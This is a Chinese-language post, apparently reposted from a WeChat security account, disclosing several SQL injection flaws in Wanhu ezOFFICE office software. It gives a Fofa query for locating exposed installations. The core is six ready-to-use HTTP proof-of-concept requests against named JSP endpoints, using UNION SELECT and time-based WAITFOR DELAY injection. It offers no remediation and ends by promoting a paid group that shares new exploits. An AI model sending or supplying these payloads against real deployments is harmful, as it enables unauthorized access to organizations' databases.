2024年1月31日14:46:23评论26 views字数 2089阅读6分57秒阅读模式

0x01 漏洞简述

—

万户ezOFFICE是一款全面的企业办公自动化软件，集成了办公协作、文档管理、流程审批等多个功能模块。它提供便捷的办公环境，帮助企业提高工作效率、降低成本，并提供灵活的定制化能力，满足不同企业的需求。万户ezOFFICE具有友好的用户界面和强大的安全性，支持跨平台使用，适用于各行各业的企业，是实现数字化办公的理想选择。

(内附POC)万户 ezOFFICE多个接口存在SQL注入

0x02 资产测绘

—

Fofa语法："Ezoffice"

0x03 漏洞复现

—

SendFileCheckTemplateEdit.jsp SQL注入

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27123456%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1Host: User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

(内附POC)万户 ezOFFICE多个接口存在SQL注入

wpsservlet SQL注入

GET /defaultroot/wpsservlet?option=getSign&userId=1;WAITFOR%20DELAY%20%270:0:5%27--&orgIdString=1&domainId=1 HTTP/1.1Host: User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

(内附POC)万户 ezOFFICE多个接口存在SQL注入

wf_accessory_delete.jsp SQL注入

GET /defaultroot/platform/bpm/work_flow/operate/wf_accessory_delete.jsp;?wf_work_accessory_id=1%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1Host: User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: close

(内附POC)万户 ezOFFICE多个接口存在SQL注入

DocumentEdit_deal.jsp SQL注入

GET /defaultroot/public/iWebOfficeSign/DocumentEdit_deal.jsp;?RecordID=1%27%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: close

(内附POC)万户 ezOFFICE多个接口存在SQL注入

DocumentEdit_unite.jsp SQL注入

POST /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip

(内附POC)万户 ezOFFICE多个接口存在SQL注入

pic.jsp SQL注入

GET /defaultroot/platform/portal/portlet/pic/pic.jsp?num=1&channelId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip

(内附POC)万户 ezOFFICE多个接口存在SQL注入

0x04 圈子介绍

—

第一时间获取新的漏洞讯息，圈内每天更新1-3篇漏洞资源

（目前帮会已更新漏洞40+，有兴趣的小伙伴可以加入帮会）

(内附POC)万户 ezOFFICE多个接口存在SQL注入

原文始发于微信公众号（代码审计战士CodeWarrior）：(内附POC)万户 ezOFFICE多个接口存在SQL注入

左青龙
微信扫一扫

右白虎
微信扫一扫

(内附POC)万户 ezOFFICE多个接口存在SQL注入

SendFileCheckTemplateEdit.jsp SQL注入

wpsservlet SQL注入

wf_accessory_delete.jsp SQL注入

DocumentEdit_deal.jsp SQL注入

DocumentEdit_unite.jsp SQL注入

pic.jsp SQL注入

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信